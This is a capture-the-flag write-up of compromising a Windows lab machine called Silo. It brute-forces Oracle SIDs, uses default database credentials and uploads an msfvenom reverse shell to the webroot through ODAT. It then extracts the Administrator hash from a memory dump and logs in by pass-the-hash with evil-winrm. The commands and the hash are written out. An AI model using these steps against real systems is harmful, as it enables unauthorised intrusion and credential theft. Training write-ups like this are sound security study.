# SILO | 10.10.10.82

## Initial Enumeration

    sudo nmap -v -T4 -sV -sC -oN nmap-initial 10.10.10.82
    
### Open Ports and Their Services

* 80 - HTTP - Microsoft IIS 8.5
* 135,49152-49159,49161 - MSRPC
* 139/445 - SMB
* 1521 - Oracle TNS Listener 11.2.0.2.0
* 5985 - WinRM

## Services Enumeration

### 80 - Microsoft IIS 8.5

This means that the underlying machine is most likely running Windows Server 2012.

The main page is just the default IIS start page:

![](img/port-80.png)

I am running a gobuster scan but it is taking forever and there are no hits so far.

### 139/445 - SMB

Enumeration is not currently possible as the guest account is disabled and I have no valid credentials yet. Might come back to this later.

### 5985 - winRM

If I had valid credentials this service would allow me remote access to the system. Might come back here later.

### 1521 - Oracle TNS Listener

This definitely stands out as it is not standard. The TNS Listener is a component of Oracle database servers. This version is vulnerable to a "TNS poison" attack, according to the output of an nmap script I ran against the port:

![](img/poison-vuln.png)

But there does not seem to be any actual exploits I could find. So I dug deeper and looked for tips on how to interact with and enumerate the service. Once again [hacktricks](https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener) had a section specifically for this. I'm going to focus on this service as the way to gain a foothold on the system.

## Foothold - Oracle TNS Listener

### SID Bruteforce

Not sure if the SIDs are enumeratable (is that a word?) because the tool I would use is not readily available, so here I am skipping ahead to bruteforcing. There are a few ways to do this, but I will use hydra since I already have it installed (hacktricks has a list of SIDs):

    hydra -L sids-oracle.txt -s 1521 10.10.10.82 oracle-sid
    
After a few moments I have found a valid SID:

![](img/hydra.png)

### Default passwords

This service has some default user:pass combos which are the low-hanging fruit everyone should try before opting for another bruteforce attack:

![](img/default-pass.png)

And in order to connect to the db correctly I will have to download a new tool - sqlplus. Since I'm running Arch, I had to install this in a different way so I won't go into it here.

One of the default creds ends up working for me and I am connected to the db:

![](img/sqlplus.png)

### Enumeration/exploitation with ODAT

ODAT is an Oracle Database Attacking Tool. It is available on [github](https://github.com/quentinhardy/odat).

The first thing I need to do with this tool is to run all of the modules on the server:

    ./odat all -s 10.10.10.82 -d XE -U scott -P tiger
    
I strike out with this, besides the server being vulnerable to TNS poisoning (which I knew already). Then I found out if I add the flag `--sysdba` to the end (and if the user has admin privs) the possibilities open up quite a bit:

![](img/odat-output.png)

With some of these options I am able to upload files to the webserver that is running on port 80. I will try first with a simple txt file:

    ./odat dbmsxslprocessor -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --putFile "C:/inetpub/wwwroot" "hi.txt" "hi.txt"
    
Then I was greeted with a positive result:

![](img/upload.png)

Let's see if I can access the file with curl:

![](img/hi.png)

Success! Now I need to upload a reverse shell somehow. First step is to generate an aspx shell using msfvenom (the IIS version indicated that .aspx is the correct format in this case):

    msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f aspx -o shell.aspx
    
Then I uploaded the shell using the same command as before, switching out the file names. Next I spun up a netcat listener on the appropriate port and then called the shell with curl:

![](img/appool-shell.png)

Finally - a foothold! Here is the user flag:

![](img/user-flag.png)

## User Enumeration

`systeminfo` tells me this is a 64-bit Windows Server 2012 R2, and it has some hotfixes installed as well.

`whoami /all` tells me this is a system user, not in the Administrators group, but 'SeImpersonateprivilege' is enabled.

In the user's Desktop dir is a text file with a Dropbox link - it is password-protected:

![](img/issue.png)

The password fails because the first character is not properly decoded. The only way that I found of figuring out that character was to go back a step (but not really because I tried many ways to get command execution on the machine) - I uploaded an .aspx webshell using ODAT. Then I ran the `type` command there and it showed that the password was "£%Hm8646uC$". So let's check out that dropbox link.

![](img/dropbox.png)

It is a zip of a memory dump, and after some research I figured out to read it I could use a program called 'volatility'.

### Memory dump

Volatility is a program with a lot of options and a lot of additional plugins. Since it can read the memdumps from many OSes and architectures, first it needs to be given a profile in order to read it all properly. The command `imageinfo` will give you some options/hints as to what profile you should use. Since I already found out that this is Windows Server 2012 R2, that is the profile that I will use. Also, one of the plugins is 'hashdump', which does what it says on the box, if there are hashes in the memdump. Let's try it out:

    volatility -f SILO.dmp --profile=Win2012R2x64 hashdump
    
Looks like we got some hashes!

![](img/hashdump.png)

## Privilege Escalation via evil-winrm + hashdump

At the start I saw that the machine has the remote admin port (5985) open, and the tool of choice for that service should be Evil-winrm, a tool that I have barely used but it is colour-coded and easy if you have credentials:

    evil-winrm -i 10.10.10.82 -u Administrator -H 9e730375b7cbcebf74ae46481e07b0c7
    
Given a moment, I am connected and I am the administrator:

![](img/privesc.png)

And the flag:

![](img/root-flag.png)

## Conclusion

This was my first Windows box after a short hiatus in December, after doing a long run of Linux boxes, so it was more difficult than expected. But each box is something new to learn, and this time I learned about Oracle databases and reading memory dumps, so if I ever see this in the future I will have some notes to fall back to.

Steps taken:

* Enumerate Oracle db on port 1521, bruteforce valid SID
* use default creds to access DB, discover write access
* upload reverse shell to webroot via ODAT, get limited shell
* find Dropbox link containing a memdump
* analyze dump to find Administrator hash
* use hash to login via evil-winrm
